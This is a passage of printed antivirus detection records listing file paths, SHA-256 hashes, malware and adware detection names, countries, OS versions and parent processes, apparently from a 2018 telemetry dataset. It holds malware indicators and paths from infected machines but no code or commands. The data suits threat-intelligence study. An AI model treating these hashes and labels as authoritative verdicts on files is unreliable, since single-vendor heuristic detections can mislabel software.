  Row(detection=Row(filename='avscan-20181104-151104-06b69955', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-151104-06B69955', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:11:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135937-d1432687', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-135937-D1432687', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:59:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='reggen.exe', filepath='C:\\Program Files\\DAEMON Tools Ultra\\RegGen.exe', filesize=2176000, name='HEUR/AGEN.1033304.#M1.#R1'), hash='d3035ca1880bf9cdf2b3c1d93358a8b399890ab7fe80d1f404c32a26d624f2dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T23:59:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-124423-86650032', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_61cd44c7\\AVSCAN-20181104-124308-763F0A28\\AVSCAN-20181104-124423-86650032', filesize=1864000, name='PUA/InstallCore.Gen.#M1.#R1'), hash='ae678786357f7cdffbc206a0055301e9703926fc28c49cdbe6d009cab4f8c8e2', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:44:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029606f', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029606f', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:15:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002942cd', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002942cd', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:37:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='filesplitterjoiner.exe', filepath='\\\\10.255.111.86\\d$\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\FileSplitterJoiner.exe', filesize=64000, name='BDS/Rogue.766118.#M1.#R1'), hash='ebf5f18b65c3440e24aa171c5a8f60d8321e55351b8dddf02022f102f94c45de', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T06:22:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp5xxvzlvq', filepath='/tmp/tmp5xxvzlvq', filesize=192000, name='TR/Downloader.Gen.#M2.#R5133'), hash='d4372429f4e1fd933b72425478d94dc930103a965123cb062c4391b2be4431a3', metadata=Row(cmdline=None, country='IE', os_name='Linux', os_vmajor='8', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T04:06:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-184207-9ac035e1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-184207-9AC035E1', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:42:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:45:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:49:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='de1b124392da6f71841028a05e7f1b4f3f15d8c35903de88f04119b60540c7a9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\DE1B124392DA6F71841028A05E7F1B4F3F15D8C35903DE88F04119B60540C7A9', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='de1b124392da6f71841028a05e7f1b4f3f15d8c35903de88f04119b60540c7a9', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:13:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-163745-55a730ba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_12cb16c6\\AVSCAN-20181104-163727-5322CCE3\\AVSCAN-20181104-163745-55A730BA', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='ed9dab9bf727d1f1a9fb1b206024b66130ef0437038c5a821870e5712a1d2d38', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:37:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T00:16:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:34:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-131134-8a334c55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d438d77\\AVSCAN-20181101-130545-537131FB\\AVSCAN-20181101-131134-8A334C55', filesize=17176000, name='APPL/Asparnet.ffffde.#M1.#R1'), hash='ffffde154bf6b36d0ceb7f5f9526b2c9dcc09f0ab5311db78069990dd47522d6', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T20:11:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='38883.html', filepath='D:\\云赚打码\\cache\\businessidresultpage\\5236876885871\\38883.html', filesize=284000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='f9f336eaedefba6e0abf26642b3f77351be84dc77bd8061382e205170cb096b3', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Program Files\\360se6\\Application\\360se.exe', parentsize=1190472, timestamp='2018-11-01T01:25:07Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avscan-20181102-192133-4b933d93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54bc9577\\AVSCAN-20181102-191914-3B86E593\\AVSCAN-20181102-192133-4B933D93', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:21:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gflashupdate.exe', filepath='\\\\?\\D:\\برامج\\ب\\gflashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:01:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qualcomm+premium+tool+v24.exe', filepath='C:\\Users\\X\\Downloads\\Qualcomm+Premium+Tool+v24.exe', filesize=2624000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='23f1dc5ebee68a180146fb4cada07dcaad2bbb9822292da223112bb2dbc2b8e7', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T14:21:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131108-78d65db5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-130408-3969CC04\\AVSCAN-20181102-131108-78D65DB5', filesize=1024000, name='Adware/CsdiMonetize.ajkoe.#M1.#R1'), hash='27ed231f47ab2f749185418f33ea7c237230d8c3a1b98ccdbcd1d008af125c21', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:11:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T05:10:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vrtc1aa.tmp', filepath='L:\\Users\\X\\AppData\\Local\\Temp\\VRTC1AA.tmp', filesize=2432000, name='TR/Crypt.Agent.aekxs.#M300.#R1234'), hash='298e393a417f4ee9d48016115a30cd0f26a09a5e0dd9eff8c2aca8af03df7b6f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:16:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-075826-313b8f05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4445c0e1\\AVSCAN-20181102-075759-2E42F5CA\\AVSCAN-20181102-075826-313B8F05', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:58:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='stage4_se.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\STAGE4_SE\\STAGE4_SE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vbe6.dll', filepath='C:\\Users\\X\\Downloads\\Autocad2009_minixiazai.com(1)\\cad2009zwpjb\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='3b0950320e586a4d87626480f0a1c30d2426588664de0c16caf5ba0ba0f25c27', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe38_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe38 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=297472, timestamp='2018-11-02T20:39:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='74e3f8080e97e05bfe24a99eb562a7d9', filepath='c:\\$recycle.bin\\s-1-5-21-1065681938-136227472-3706928249-1000\\$r00gqtw\\74e3f8080e97e05bfe24a99eb562a7d9', filesize=896000, name='HEUR/AGEN.1000251.#M15.#R1000251'), hash='48f6ba8487d17bf9829f914953b1b10b2542c7c653605f6fd92cdfdf90fd3b46', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:44:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-190045-beb59c45', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e88d296e\\AVSCAN-20181102-184546-221740AC\\AVSCAN-20181102-190045-BEB59C45', filesize=5600000, name='PUA/MyPCBackup.#M1.#R1'), hash='6faf0ee307903290e31e2097dae91d0439aa112ba2e53a53f9f23ef5798e1a82', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:00:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155926-e99dcf84', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155926-E99DCF84', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:59:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='59d42f667f52e4572ae41eba26f810867c3a9b041622fb5bbbc5818e8f6f7fe8', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T16:05:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='2c53eb208a8212d4b6ac2fa8f7e28d8ce39c7d8bbd09a474eda7d0a18e261bb7', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T08:00:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret_8169902e_840e707b.exe', filepath='F:\\JDownloader\\Yamicsoft.Windows.10.Manager.v2.3.5\\URET\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET_8169902e_840e707b.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T14:01:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-165850-9f31052f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a9d890e6\\AVSCAN-20181102-165840-9D54F749\\AVSCAN-20181102-165850-9F31052F', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:58:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='synctask.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\Pegegegof\\synctask.exe', filesize=2240000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='4f4e20674495e12fba9581ddf50e794aa62cc386758f259e02e2cd0cd4338cbd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T21:48:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sentineldrv32support.exe', filepath='C:\\Program Files\\Common Files\\SafeNet Sentinel\\Sentinel System Driver\\SentinelDrv32Support.exe', filesize=116000, name='W32/Sality.AT.#M1.#R1'), hash='3c3fa414cc0379e2ebe2f84e4cfec87c7fb0aadb4134ecb09ac91ea9bf937926', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:LoDbY3aSHkmFpCm8.1', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=116928, timestamp='2018-11-02T08:04:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='odin3 v3.10.6.exe', filepath='\\\\192.168.0.5\\desha_itd\\2.) OTHER THINGS\\LAHAT NG INSTALLER\\J7 FLASH FIRM WARE\\Odin3_v3.10.6\\Odin3 v3.10.6.exe', filesize=2368000, name='W32/Viking.AT.#M1.#R1'), hash='169e5d1c7f4fea8069f854d04d1ef83b60ab96d9fdd7334ea961c2d0b548f687', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2373784, timestamp='2018-11-02T13:59:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T19:11:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T06:45:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0127316.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0127316.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102917-b9c7aad9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_57b9abd2\\AVSCAN-20181102-102813-AE3A2179\\AVSCAN-20181102-102917-B9C7AAD9', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:29:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-191425-e036d9b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_052d2528\\AVSCAN-20181101-191350-D97488C5\\AVSCAN-20181101-191425-E036D9B5', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:14:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:55:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:34Z'), dt=datetime.date(2018, 11, 2)),
